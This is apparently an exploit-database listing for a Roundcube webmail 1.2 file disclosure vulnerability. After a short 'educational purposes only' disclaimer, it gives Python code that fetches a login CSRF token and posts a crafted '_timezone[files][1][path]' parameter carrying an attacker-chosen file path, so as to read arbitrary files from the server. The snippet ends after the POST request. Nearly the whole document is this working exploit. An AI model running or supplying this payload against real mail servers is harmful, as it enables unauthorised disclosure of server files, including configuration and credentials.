Exploits / Vulnerability Discovered : 2021-02-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Roundcube webmail 1.2 file disclosure is for educational purposes only and if it is used you will do on your own risk!
def main():
s = requests.Session()
r = s.get(URL,params={"_task":"login"},verify=False)
token = None
for line in r.text.split("\n"):
if 'name="_token"' in line:
token = line.split("value=")[1].split('"')[1]
print("[+] token: %s" % token)
if token is None:
print("[!] unable to retrieve token")
sys.exit(1)
data = {
"_token":token,
"_task":"login",
"_action":"login",
"_timezone[files][1][path]":sys.argv[1],
"_url":"_task%3Dlogin",
"_user":USER,
"_pass":PASS
}
r = s.post(URL,params={"_task":"login"},data=data,verify=False)